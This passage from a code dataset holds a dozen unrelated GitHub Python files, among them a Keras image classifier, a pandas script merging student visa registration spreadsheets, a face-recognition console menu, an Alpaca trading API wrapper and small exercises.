nsfw_prob.astype(str)\n return web.Response(text=text)\n except KeyError:\n error_text = \"Missing `url` or `file` POST parameter\"\n return HTTPBadRequest(text=error_text)\n except OSError as e:\n if \"cannot identify\" in str(e):\n raise HTTPUnsupportedMediaType(text=\"Invalid image\")\n else:\n raise e\n except ValueError:\n raise HTTPBadRequest(text=\"Malformed image provided\")\n\n\nasyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\nsession = aiohttp.ClientSession()\napp = web.Application()\napp.router.add_route(\"*\", \"/\", API)\nweb.run_app(app)\n","repo_name":"rahiel/open_nsfw--","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"54"} +{"seq_id":"26608262886","text":"#Importing Necessary 
Libraries\nfrom PIL import Image\nimport numpy as np\nimport os\nimport cv2\nimport keras\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D,MaxPooling2D,Dense,Flatten,Dropout\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"C:/Users/nEW u/MACHINE LEARNING/project/paddygrass-distinguisher/images/\"))\n\ndata=[]\nlabels=[]\ndata_a=os.listdir(\"C:/Users/nEW u/MACHINE LEARNING/project/paddygrass-distinguisher/images/images/ImageDataset/\")\nfor a in data_a:\n try:\n image=cv2.imread(\"C:/Users/nEW u/MACHINE LEARNING/project/paddygrass-distinguisher/images/images/ImageDataset/\"+a)\n image_from_array = Image.fromarray(image, 'RGB')\n size_image = image_from_array.resize((50, 50))\n data.append(np.array(size_image))\n labels.append(0)\n except AttributeError:\n print(\"\")\n\ntest=os.listdir(\"C:/Users/nEW u/MACHINE LEARNING/project/paddygrass-distinguisher/images/images/ImageTestset/\")\nfor b in test:\n try:\n image=cv2.imread(\"C:/Users/nEW u/MACHINE LEARNING/project/paddygrass-distinguisher/images/images/ImageTestset/\"+b)\n image_from_array = Image.fromarray(image, 'RGB')\n size_image = image_from_array.resize((50, 50))\n data.append(np.array(size_image))\n labels.append(1)\n except AttributeError:\n print(\"\")\n \nCells=np.array(data)\nlabels=np.array(labels)\n\n#Saving and Loading the data we prepared so next time we can load it from saved .npy file.\n\nnp.save(\"Cells\",Cells)\nnp.save(\"labels\",labels)\n\nCells=np.load(\"Cells.npy\")\nlabels=np.load(\"labels.npy\")\n\n#Do Train/Test Split of data and labels that prepared in early section. \n#Classes are defined as the unique labels in the data. 
Here it will be \n#2 as Parasitized:0 and Uninfected:1, here 0 and 1 are the mapping in \n#labels for these two classes\n\ns=np.arange(Cells.shape[0])\nnp.random.shuffle(s)\nCells=Cells[s]\nlabels=labels[s]\n\nnum_classes=len(np.unique(labels))\nlen_data=len(Cells)\n\n(x_train,x_test)=Cells[(int)(0.1*len_data):],Cells[:(int)(0.1*len_data)]\nx_train = x_train.astype('float32')/255 # As we are working on image data we are normalizing data by divinding 255.\nx_test = x_test.astype('float32')/255\ntrain_len=len(x_train)\ntest_len=len(x_test)\n\n(y_train,y_test)=labels[(int)(0.1*len_data):],labels[:(int)(0.1*len_data)]\n\n#Doing One hot encoding as classifier has multiple classes\ny_train=keras.utils.to_categorical(y_train,num_classes)\ny_test=keras.utils.to_categorical(y_test,num_classes)\n\n#creating sequential model\nmodel=Sequential()\nmodel.add(Conv2D(filters=16,kernel_size=2,padding=\"same\",activation=\"relu\",input_shape=(50,50,3)))\nmodel.add(MaxPooling2D(pool_size=2))\nmodel.add(Conv2D(filters=32,kernel_size=2,padding=\"same\",activation=\"relu\"))\nmodel.add(MaxPooling2D(pool_size=2))\nmodel.add(Conv2D(filters=64,kernel_size=2,padding=\"same\",activation=\"relu\"))\nmodel.add(MaxPooling2D(pool_size=2))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(500,activation=\"relu\"))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(2,activation=\"softmax\"))#2 represent output layer neurons \nmodel.summary()\n\n# compile the model with loss as categorical_crossentropy and using adam optimizer you can test result by trying RMSProp as well as Momentum\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n#Fit the model with min batch size as 50[can tune batch size to some factor of 2^power ] \nmodel.fit(x_train,y_train,batch_size=50,epochs=20,verbose=1)\n\n#Check the accuracy on Test data:\naccuracy = model.evaluate(x_test, y_test, verbose=1)\nprint('\\n', 'Test_Accuracy:-', accuracy[1])\n\n#Save the model weights:\n \nfrom keras.models import load_model\nmodel.save('save.h5')\n\n\n\n","repo_name":"avinash1605/Paddy-Grass-Distinguisher","sub_path":"code file.py","file_name":"code file.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34466059416","text":"import time\nimport os\nimport pandas as pd\nimport numpy as np\nfrom Handlers.directories import path_to_final_data_S20\nfrom Handlers.major_advisor_data import ug_final_df, gr_final_df\nfrom Handlers.file_imports import NEW_students_FINAL, \\\n NEW_students, new_stud_issm_data, sevis_inital_student_data, \\\nissm_reg_data_success, NEW_final_MASTER, issm_add_address_phone\n\n\noutname = 'data_diff.csv'\n\noutdir = path_to_final_data_S20\nif not os.path.exists(outdir):\n os.mkdir(outdir)\n\nfullname = os.path.join(outdir, outname)\n\n\ndef dataframe_difference(which=None):\n \"\"\"Find rows which are different between two DataFrames.\"\"\"\n df1 = pd.read_csv(new_stud_issm_data)\n df2 = pd.read_csv(sevis_inital_student_data)\n\n # filter the data by a date range. 
Need to set csv file ['Program Start Date'}\n # to Short Date\n filtered = df2[(df2['Program Start Date'] > '1/1/2020')\n & (df2['Program Start Date'] < '2/1/2020')]\n # compare the data via an outer join to capture all rows from both data sets\n comparison_df = df1.merge(filtered, indicator=True, how='outer')\n\n if which is None:\n diff_df = comparison_df[comparison_df['_merge'] != 'both']\n else:\n diff_df = comparison_df[comparison_df['_merge'] == which]\n diff_df.to_csv(fullname)\n return diff_df\n\n\ndef merge_new_data():\n \"\"\"\n Merges data via pandas merge function and then exports the updated\n Dataframe to an Excel spreadsheet. The function also removes\n duplicates.\n \"\"\"\n issm_sev_pending = pd.read_csv(new_stud_issm_data)\n sev_pending = pd.read_csv(sevis_inital_student_data)\n\n # filter the data by a date range\n filtered = sev_pending[(sev_pending['Program Start Date'] > '1/1/2020')\n & (sev_pending['Program Start Date'] < '2/1/2020')]\n\n results = pd.merge(filtered, issm_sev_pending[\n ['Campus Id', 'SEVIS ID','Profile Status','Level of Education (display)',\n 'Major Field (display)', '03 Student Status Term',\n '07 Total Credit Hours', '04 Transfer From', '06 Transfer In Date',\n '20 ISO Attendance Date', '14 CHECK IN I94 or Entry Stamp',\n '05 Banner Student Status', 'E-mail Address',\n 'Phone 1', '26 University advisor','DataLink Active']],\n on='SEVIS ID', how='left')\n # indicator=True)\n cleaned_results = \\\n results.drop_duplicates(subset=['SEVIS ID'], keep='last').copy()\n cleaned_results = cleaned_results[[\n 'E-mail Address', 'Campus Id', 'SEVIS ID', 'Surname/Primary Name',\n 'Given Name', 'Class of Admission', 'Profile Status',\n 'Level of Education (display)', 'Program Start Date',\n 'Major Field (display)', '04 Transfer From', '06 Transfer In Date',\n '03 Student Status Term', '07 Total Credit Hours',\n '20 ISO Attendance Date', '14 CHECK IN I94 or Entry Stamp',\n '05 Banner Student Status', 'Eligible for Registration',\n 'DataLink Active', 'E-mail Address', 'Phone 1', '26 University advisor']]\n # can be a list, a Series, an array or a scalar\n # cleaned_results.insert(loc=0, column='Registration Status', value='')\n cleaned_results.insert(loc=0, column='Registration Notes', value='')\n\n return cleaned_results\n\n\ndef match_new_advisor(cleaned_results, ug_final_df, gr_final_df):\n \"\"\"\n match_advisor checks the majors in a column of workbook(ws) and\n then matches them with the advisor in a dictionary from the module:\n major_advisor_data\n \"\"\"\n cleaned_results = cleaned_results\n\n ug_final_df.columns = ['Major Field (display)', 'Advisor', 'Level of Education (display)']\n gr_final_df.columns = ['Major Field (display)', 'Advisor', 'Level of Education (display)']\n\n ug_results = pd.merge(cleaned_results, ug_final_df[\n ['Advisor',\n 'Level of Education (display)',\n 'Major Field (display)']],\n on=['Level of Education (display)', 'Major Field (display)'],\n how='left')\n\n gr_results = pd.merge(ug_results, gr_final_df[\n ['Advisor',\n 'Level of Education (display)',\n 'Major Field (display)']],\n on=['Level of Education (display)', 'Major Field (display)'],\n how='left')\n\n # combine the two advisor DataFrame columns\n gr_results['Advisor'] = \\\n gr_results.pop(\"Advisor_x\").fillna(gr_results.pop(\"Advisor_y\")).astype(str)\n\n writer = pd.ExcelWriter(NEW_students_FINAL)\n gr_results.to_excel(writer, 'Sheet1', index=False)\n writer.save()\n\n\ndef add_advisor_notes():\n \"\"\"\n add_advisor_notes fills any null values in Total Credit 
Hours(TCH),\n CHECK IN I94(CI94) with zeros and Not Complete, respectively, and then\n inserts a Registration Notes column and populates it with a formatted\n string of values from TCH and CI94\n \"\"\"\n final_workbook = pd.read_excel(NEW_students_FINAL)\n\n # remove NaN values and replace with readable notes for users\n units = final_workbook['07 Total Credit Hours'].fillna(0)\n check_in = final_workbook['14 CHECK IN I94 or Entry Stamp']. \\\n fillna('Not Complete')\n\n # convert the two Series to numpy char arrays\n a = np.char.array(check_in.values)\n b = np.char.array(units.values)\n\n # concatenate the two numpy char arrays, b' represents\n # a Boolean check (bytes) for the astype (str) function\n final = final_workbook['Registration Notes'] = \\\n (b'SV Status: ' + a + b', Registered Units: ' + b).astype(str)\n # convert the concatenated char array to a DataFrame.\n df_final = pd.DataFrame(final, columns=['Registration Notes'])\n\n # drop registration column on final workbook\n final_workbook.drop(['Registration Notes'], axis=1, inplace=True)\n # combine the two DataFrames. axis=1 concatenates horizontally\n # rather than vertically\n df_combine = pd.concat([df_final, final_workbook], axis=1)\n\n with pd.ExcelWriter(NEW_students_FINAL, mode='w') as writer:\n df_combine.to_excel(writer, 'Sheet1', index=False,\n engine='openpyxl')\n writer.save()\n\n\ndef sort_new_data():\n \"\"\"\n Function to sort the Dataframe and then spreadsheet by I-94 check-in\n entry and then by campusID\n \"\"\"\n active_data = pd.read_excel(NEW_students_FINAL, sheet_name=0)\n sorted_by_CWID = active_data.sort_values(['14 CHECK IN I94 or Entry Stamp'], ascending=True)\n\n writer = pd.ExcelWriter(NEW_students_FINAL, engine='openpyxl')\n writer.book = NEW_students\n writer.sheets = dict((ws.title, ws) for ws in NEW_students.worksheets)\n\n sorted_by_CWID.to_excel(writer, 'Sheet', index=False)\n writer.save()\n\n\ndef print_new_work_done():\n work_output = [\"-Built discrepancy report\",\n \"-New Excel workbook built\",\n \"-Read ISSM Report\",\n \"-Read SEVIS Report\",\n \"-Data between reports matched on SEVIS ID\",\n \"-Matched Advisors based on Major data\",\n \"-New Data saved to NEW_Final workbook\",\n \"-Sorted by CWID\"]\n for work in work_output:\n time.sleep(0.3)\n print(work)\n\n\ndef update_checkin_status():\n \"\"\"\n update_checkin_status, will reference a newer workbook with the\n existing final_workbook and update fields defined in the function\n with the most up to date value.\n \"\"\"\n active_pending_issm = pd.read_excel(issm_add_address_phone)\n final_workbook = pd.read_excel(NEW_final_MASTER)\n\n # drop columns to merge new data from active_pending_issm worksheet properly\n try:\n final_workbook.drop(['03 Student Status Term',\n '07 Total Credit Hours',\n '14 CHECK IN I94 or Entry Stamp'], axis=1,\n inplace=True)\n # Save workbook to apply changes\n with pd.ExcelWriter(NEW_final_MASTER, mode='w') as writer:\n final_workbook.to_excel(writer, 'Sheet1', index=False,\n engine='openpyxl')\n writer.save()\n except:\n print(\"Columns don't exist. 
No drop performed.\")\n\n finally:\n results = pd.merge(final_workbook, active_pending_issm[\n ['Campus Id', '03 Student Status Term',\n '07 Total Credit Hours', '14 CHECK IN I94 or Entry Stamp',\n 'Address Type', 'Address Line 1', 'Address Line 2',\n 'City', 'Phone 1']], how='left', on='Campus Id')\n\n cleaned_results = \\\n results.drop_duplicates(subset=['SEVIS ID'], keep='first')\n\n # rename_cols = cleaned_results.rename(columns=\n # {'03 Student Status Term_x':'03 Student Status Term',\n # '07 Total Credit Hours_x':'07 Total Credit Hours',\n # '14 CHECK IN I94 or Entry Stamp_x':'14 CHECK IN I94 or Entry Stamp'})\n\n try:\n final_layout = cleaned_results[[\n 'Registration Notes', 'Event Name', 'Event Status',\n 'Advisor', 'E-mail Address', 'Campus Id', 'SEVIS ID',\n 'Surname/Primary Name', 'Given Name', 'Class of Admission',\n 'Level of Education (display)', 'Major Field (display)',\n '03 Student Status Term', '07 Total Credit Hours',\n '14 CHECK IN I94 or Entry Stamp', '05 Banner Student Status',\n 'Eligible for Registration', 'DataLink Active',\n 'Address Type', 'Address Line 1', 'Address Line 2',\n 'City', 'Phone 1']]\n except:\n final_layout = cleaned_results[[\n 'Registration Notes', 'Advisor', 'E-mail Address', 'Campus Id',\n 'SEVIS ID', 'Surname/Primary Name', 'Given Name', 'Class of Admission',\n 'Level of Education (display)', 'Major Field (display)',\n '03 Student Status Term', '07 Total Credit Hours',\n '14 CHECK IN I94 or Entry Stamp','05 Banner Student Status',\n 'Eligible for Registration', 'DataLink Active',\n 'Address Type', 'Address Line 1', 'Address Line 2',\n 'City','Phone 1']]\n\n with pd.ExcelWriter(NEW_final_MASTER, mode='w') as writer:\n final_layout.to_excel(writer, 'Sheet1', index=False,\n engine='openpyxl')\n writer.save()\n\n\ndef match_registration_event():\n \"\"\"\n match registration event will add two columns from an ISSM report that\n contains SEVIS Registration event information and join it on the new\n NEW_Students_FINAL workbook\n \"\"\"\n final_workbook = pd.read_excel(NEW_final_MASTER)\n issm_reg = pd.read_excel(issm_reg_data_success)\n\n try:\n final_workbook.drop(['Event Name', 'Event Status'], axis=1,\n inplace=True)\n # Save workbook to apply changes\n with pd.ExcelWriter(NEW_final_MASTER, mode='w') as writer:\n final_workbook.to_excel(writer, 'Sheet1', index=False,\n engine='openpyxl')\n writer.save()\n\n except:\n print(\"Columns don't exist. 
No drop performed.\")\n\n finally:\n # perform merge with new data from active_pending_issm\n results = pd.merge(final_workbook, issm_reg[\n ['SEVIS ID', 'Event Name', 'Event Status']],\n on='SEVIS ID', how='left')\n # indicator=True)\n cleaned_results = \\\n results.drop_duplicates(subset=['SEVIS ID'], keep='first')\n\n final_layout = cleaned_results[[\n 'Registration Notes', 'Event Name', 'Event Status',\n 'E-mail Address', 'Campus Id', 'SEVIS ID',\n 'Surname/Primary Name', 'Given Name',\n 'Class of Admission', 'Level of Education (display)',\n 'Major Field (display)', '03 Student Status Term',\n '07 Total Credit Hours', '14 CHECK IN I94 or Entry Stamp',\n '05 Banner Student Status', 'Eligible for Registration',\n 'DataLink Active', 'Advisor']]\n\n with pd.ExcelWriter(NEW_final_MASTER, mode='w') as writer:\n final_layout.to_excel(writer, 'Sheet1', index=False,\n engine='openpyxl')\n writer.save()\n\n\nif __name__ == '__main__':\n start_time = time.time()\n dataframe_difference(which=None)\n match_new_advisor(merge_new_data(), ug_final_df, gr_final_df)\n add_advisor_notes()\n sort_new_data()\n print_new_work_done()\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"nmbenzo/SEVIS_student_data","sub_path":"New_Student_Registration/populate_new_student_notes.py","file_name":"populate_new_student_notes.py","file_ext":"py","file_size_in_byte":12275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22497977796","text":"\nimport os\nimport time\nimport sys\n\n\n\ndef Display(msg,t,var):\n for x in msg:\n if (var == 1):\n print('\\033[1m' + x, end=' ')\n elif (var == 0):\n print('\\033[1m' + x, end='')\n sys.stdout.flush()\n time.sleep(t)\n\n\n\ndef Clear():\n os.system( 'cls' )\n\nans=True\nwhile (ans==True):\n Clear()\n Display(\"\\n\\n ************ Face detection System Genered By ABDALLAOUI MAAN Amine *********** \\n\\n\",0.02,0)\n print('--> Please choose the option that you would executed : \\n')\n print (\"\"\"\n 1.Add a Student\n 2.Edit DataFrame cell\n 3.Delete a Student\n 4.Create a dataSet\n 5.Training DataSet\n 6.Detector\n 7.DataFrame consulting\n 8.New day (Make all Absent)\n 9.Exit/Quit\n \"\"\")\n choice=input(\" [+] What would you like to do? 
\" )\n if choice==\"1\":\n os.system('python ADD_STUDENT.py')\n print(\"\\nStudent Added\")\n \n \n elif choice==\"2\":\n os.system('python CHANGE_CELL.py')\n print(\"\\n Cell edited\")\n \n elif choice==\"3\":\n os.system('python DELETE_STUDENT.py')\n print(\"\\n Student Deleted\")\n \n elif choice==\"4\":\n os.system('python datasetCreator.py')\n print(\"\\n DataSet Created\")\n \n elif choice==\"5\":\n os.system('python Trainner.py') \n print(\"\\n Trainning finished\")\n \n elif choice==\"6\":\n os.system('python detector.py')\n\n elif choice==\"7\":\n os.system('python DATA_CONSULTING.py')\n print('\\n')\n\n \n elif choice==\"8\":\n os.system('python NEW_DAY.py')\n \n elif choice==\"9\":\n print(\"\\n Goodbye\")\n print(\" -->Thanks for using our face recognition system ...!\")\n Display('\\n ***** MASTER INFORMATIQUE ET TELECOMMUNICATION *****\\n\\n',0.1,1)\n break\n \n elif choice !=\"\":\n print(\"\\n Not Valid Choice Try again\") \n \n","repo_name":"Abdallaoui-maan-Amine/Class_Presence_Handling_using_FaceRecognition","sub_path":"Menu.py","file_name":"Menu.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37966150228","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\ndb_name=''\n\npushover_app_token=''\nsia_base = 'https://www.sia.aviation-civile.gouv.fr/aip/enligne/Atlas-VAC/FR/'\nsia_link_page = 'VACProduitPartie.htm'\nsia_link_needle = 'Liste de contr'\n\npdf_dst = 'ctrl.pdf'\npdf_regex = \"^(?P(?:AD 2 (?PLF[A-Z]{2})|AD-2\\.VAC\\.(?PLF[A-Z]{2})).*) (?P[0-9]{2} (?:JAN|FEB|MAR|APR|MAY|JUN|JUL|AUG|SEP|OCT|NOV|DEC) [0-9]{4})$\"\npdf_pages = (15, 30)\npdf_ad = (300, 600)\npdf_records = (1000, 2000)\n","repo_name":"mwetterw/Mellovvac","sub_path":"src/config.sample.py","file_name":"config.sample.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18696017877","text":"from utils import pyengine\nimport glfw\n\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = 1000\n\nwindow = pyengine.create_window(SCREEN_WIDTH, SCREEN_HEIGHT)\n\n# engine initialization\nscene = pyengine.PyEngine(SCREEN_WIDTH, SCREEN_HEIGHT)\nscene.init(GUI=False)\n\nscene.State = pyengine.State.GAME_ACTIVE\n\n# set light\nlight = False\n\n# set game object's attributes\norientation = [1.0, 0.0, 0.0,\n 0.0, 1.0, 0.0,\n 0.0, 0.0, 1.0]\nposition = [0.0, 0.0, 0.0]\nsize = [3.0, 0.0, 3.0]\n\n# create ground object\nground = scene.create_object(\"ground\", orientation, position, size)\n\n# create boxes\nboxes = []\nfor i in range(5):\n for j in range(5):\n for k in range(5):\n size = 0.05\n basePosition = [\n i * 5 * size + (k * size), j * 10 * size, k * 5 * size + 5\n ]\n size = [0.05, 0.05, 0.05]\n box = scene.create_object(\"box\", orientation, basePosition, size)\n scene.add_box_to_engine(box)\n boxes.append(box)\n\nscene.set_simulation_speed(1)\n\ntimer = glfw.get_time()\nframes = updates = 0\n\nwhile 1:\n now_time = glfw.get_time()\n scene.update_from_physic_engine(boxes)\n\n for box in boxes:\n box.draw(light=False, GUI=False)\n\n frames += 1\n\n if glfw.get_time() - timer > 1.0:\n timer += 1\n print(\"FPS: \", frames)\n updates = frames = 0\n\npyengine.terminate()\n","repo_name":"mertlsarac/PyEngine","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} 
+{"seq_id":"21387395216","text":"\"\"\"--------------------ι𝐍Ⓙย𝐬𝓣ᶤςⒺ Ⓐ𝐍YωᕼⒺг𝐄 ᶤ𝐬 ᵃ thяᗴAт ⓉO 𝐣υ𝔰t𝐢ᶜⓔ 𝐄V乇яy山卄εŘ乇 --------------------\n\nDescription:\n Extracts information from a dictionary and prints information about a student.\n\nUsage:\n python lab2.py\n\n---------------------ι𝐍Ⓙย𝐬𝓣ᶤςⒺ Ⓐ𝐍YωᕼⒺг𝐄 ᶤ𝐬 ᵃ thяᗴAт ⓉO 𝐣υ𝔰t𝐢ᶜⓔ 𝐄V乇яy山卄εŘ乇--------------------\"\"\"\ndef main():\n about_me = {\n\n 'full_name': 'Geoff Smith',\n 'student_id': 10256979,\n 'pizzatoppings': ['OLIVES', 'SAUSAGE', 'ONIONS'],\n 'movies': [\n {\n 'title': 'gladiator',\n 'genre': 'action'\n\n },\n {\n 'title': 'interstellar',\n 'genre': 'science fiction'\n },\n ] \n }\n about_me['movies'].append({'title': 'tenet', 'genre': 'thriller'})\n name_id(about_me)\n print_pizza_toppings(about_me)\n add_pizza_toppings(about_me, ('PINEAPPLE', 'PEPPERONI'))\n print_pizza_toppings(about_me)\n print_movie_genres(about_me)\n print_movie_titles(about_me)\n\n# Function that prints Name and student number\ndef name_id(about_me):\n first_name = str.split(about_me['full_name'])\n print(f'My name is ', about_me['full_name'], end=', ') \n print(f'but you can call me King {first_name[0]}.')\n print('My student ID is', about_me['student_id'], end='.\\n')\n\n#Function that adds pizza toppings to data structure\ndef add_pizza_toppings(about_me, toppings):\n about_me['pizzatoppings'].extend(toppings)\n for i,t in enumerate(about_me['pizzatoppings']):\n about_me['pizzatoppings'][i] = t.lower() \n about_me['pizzatoppings'].sort()\n\n#Function that prints bullet list of pizza toppings\ndef print_pizza_toppings(about_me):\n print('\\nMy favourite pizza toppings are:')\n for t in about_me['pizzatoppings']:\n print(f'- {t}')\n\n#Function that prints comma-separated list of movie genres\ndef print_movie_genres(about_me):\n print('\\nI like to watch', end=' ')\n movie_genres = [g['genre'] for g in about_me['movies']]\n genre_list = ', '.join(movie_genres)\n x = str.split(genre_list)\n x.insert(-1, 'and')\n genre_list_edited = ' '.join((s) for s in x)\n print(genre_list_edited, end=' movies.\\n')\n \n#Function that prints comma-separated list of movie titles\ndef print_movie_titles(movie_list):\n print('\\nSome of my favourite movies are', end=' ')\n movie_titles = [g['title'].title() for g in movie_list['movies']]\n movies = ', '.join(movie_titles)\n x = str.split(movies)\n x.insert(-1, 'and')\n movies_edited = ' '.join((s)for s in x)\n print(movies_edited, end='!')\n\nif __name__ == '__main__':\n main()","repo_name":"Deryaus/COMP-593-Lab2","sub_path":"lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74095840482","text":"# Given a binary tree, imagine yourself standing on the right side of it,\n# return the values of the nodes you can see ordered from top to bottom.\n#\n# For example:\n# Given the following binary tree,\n# 1 <---\n# / \\\n# 2 3 <---\n# \\ \\\n# 5 4 <---\n# You should return [1, 3, 4].\n#\n\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nimport collections\n\n\nclass Solution(object):\n def rightSideView(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n def helper(node, depth):\n if node:\n d[depth].append(node.val)\n helper(node.left, depth+1)\n helper(node.right, depth+1)\n d = collections.defaultdict(list)\n helper(root, 0)\n return [x[-1] for x in 
d.values()]","repo_name":"JadaHelloWorld/leedcode","sub_path":"2017_8_24/new/BinaryTreeRightSideView_199.py","file_name":"BinaryTreeRightSideView_199.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28878539371","text":"#!/usr/bin/env python \n#ryan g. coleman ryangc@mail.med.upenn.edu \n#usage: grab_pdb_chain.py file\n\n#grab system, string, regular expression, and operating system modules\nimport sys, string, re, os, math\nimport grab_pdb #for getCode function\nimport pdb #for chain sorting ease\n\ndef getCodeChain(pdbCode, chain):\n fileName = grab_pdb.getCode(pdbCode)\n pdbD = pdb.pdbData(fileName)\n newPdbD = pdbD.getOneChain(chain)\n newPdbD.write(pdbCode + \".\" + chain + \".pdb\")\n\ndef copyCode(pdbCode):\n fileName = grab_pdb.getCode(pdbCode)\n pdbD = pdb.pdbData(fileName)\n pdbD.write(pdbCode + \".-.pdb\")\n\nif -1 != string.find(sys.argv[0], \"grab_pdb_chain.py\"): \n list = open(sys.argv[1], 'r')\n linesList = list.readlines()\n list.close()\n for line in linesList:\n tokens = string.split(line)\n if len(tokens) == 1: \n code = string.strip(tokens[0])\n if len(code) == 4: #just pdb, no chain necessary\n copyCode(code)\n else:\n codePdb = code[:4]\n codeChain = code[4]\n getCodeChain(codePdb, codeChain)\n elif len(tokens) > 1:\n code = string.strip(tokens[0])\n chain = string.strip(tokens[1])\n getCodeChain(code, chain)\n\n\n","repo_name":"ryancoleman/tdt2014-part2","sub_path":"scripts/grab_pdb_chain.py","file_name":"grab_pdb_chain.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28345663950","text":"# API.py\n# Hold lists of api classes to use with application\n\nimport config as conf\nimport requests\nimport json\n\nclass BaseAPI:\n \"\"\"Base API Class\"\"\"\n\n def __init__(self, base_url, endpoint):\n self._API_BASE_URL = base_url\n self._ENDPOINT = endpoint\n\n def request(self, method, headers, params):\n url = self._API_BASE_URL + self._ENDPOINT\n\n response = None\n if headers == None and params == None:\n response = requests.request(method, url)\n elif headers == None and params != None:\n response = requests.request(method, url, params=params)\n elif headers != None and params == None:\n response = requests.request(method, url, headers=headers)\n else:\n response = requests.request(method, url, headers=headers, params=params)\n\n return response\n\n def get(self, headers=None, params=None):\n return self.request(\"GET\", headers, params)\n\n def request_json(self, method=\"GET\", headers=None, params=None):\n print(self, method, headers, params)\n\n response = self.request(method, headers, params)\n return json.loads(response.text)\n\n def get_json(self, headers=None, params=None):\n return self.request_json(\"GET\", headers, params)\n\nclass AlpacaAPI(BaseAPI):\n \"\"\"Base Alpaca API Class\"\"\"\n\n def __init__(self, api_key_id, api_key, base_url, endpoint):\n self._API_KEY_ID = api_key_id\n self._API_KEY = api_key\n super().__init__(base_url, endpoint)\n\n def request(self, method, params):\n headers = {\"APCA-API-KEY-ID\": self._API_KEY_ID, \"APCA-API-SECRET-KEY\": self._API_KEY}\n url = self._API_BASE_URL + self._ENDPOINT\n\n response = requests.request(method, url, headers=headers, params=params)\n\n return response\n\n def get(self, params=None):\n return self.request(\"GET\", params)\n\n def request_json(self, method=\"GET\", params=None):\n 
response = self.request(method, params)\n return json.loads(response.text)\n\n def get_json(self, params=None):\n return self.request_json(\"GET\", params)\n\n\nclass AlpacaPaperDataAPI(AlpacaAPI):\n \"\"\"Base Alpaca Paper API Class\"\"\"\n\n def __init__(self, endpoint):\n super().__init__(conf.ALPACA_PAPER_API_KEY_ID, conf.ALPACA_PAPER_API_SECRET_KEY, conf.ALPACA_BASE_DATA_URL, endpoint)\n\nclass AlpacaPaperTradingAPI(AlpacaAPI):\n \"\"\"Base Alpaca Paper API Class\"\"\"\n\n def __init__(self, endpoint):\n super().__init__(conf.ALPACA_PAPER_API_KEY_ID, conf.ALPACA_PAPER_API_SECRET_KEY, conf.ALPACA_PAPER_BASE_TRADING_URL, endpoint)\n\n def create_bracket_order(self, symbol, qty, entry, limit, take, stop):\n headers = {\"APCA-API-KEY-ID\": self._API_KEY_ID, \"APCA-API-SECRET-KEY\": self._API_KEY}\n url = self._API_BASE_URL + self._ENDPOINT\n data = {\n \"symbol\": symbol,\n \"qty\": qty,\n \"side\": \"buy\",\n \"type\": \"stop_limit\",\n \"time_in_force\": \"day\",\n \"stop_price\": entry,\n \"limit_price\": limit,\n \"order_class\": \"bracket\",\n \"take_profit\": {\n \"limit_price\": take\n },\n \"stop_loss\": {\n \"stop_price\": stop\n }\n }\n\n response = requests.post(url, json=data, headers=headers)\n\n return json.loads(response.content)\n","repo_name":"kkdelux/3BPTradingBot","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36855936122","text":"import altair as alt\nimport numpy as np\nimport pandas as pd\nimport streamlit as st\n\n\"\"\"\n# Welcome to Streamlit!\n\nEdit `/streamlit_app.py` to customize this app to your heart's desire :heart:.\nIf you have any questions, checkout our [documentation](https://docs.streamlit.io) and [community\nforums](https://discuss.streamlit.io).\n\nIn the meantime, below is an example of what you can do with just a few lines of code:\n\"\"\"\n\nnum_points = st.slider(\"Number of points in spiral\", 1, 10000, 1100)\nnum_turns = st.slider(\"Number of turns in spiral\", 1, 300, 31)\n\nindices = np.linspace(0, 1, num_points)\ntheta = 2 * np.pi * num_turns * indices\nradius = indices\n\nx = radius * np.cos(theta)\ny = radius * np.sin(theta)\n\ndf = pd.DataFrame({\n \"x\": x,\n \"y\": y,\n \"idx\": indices,\n \"rand\": np.random.randn(num_points),\n})\n\nst.altair_chart(alt.Chart(df, height=700, width=700)\n .mark_point(filled=True)\n .encode(\n x=alt.X(\"x\", axis=None),\n y=alt.Y(\"y\", axis=None),\n color=alt.Color(\"idx\", legend=None, scale=alt.Scale()),\n 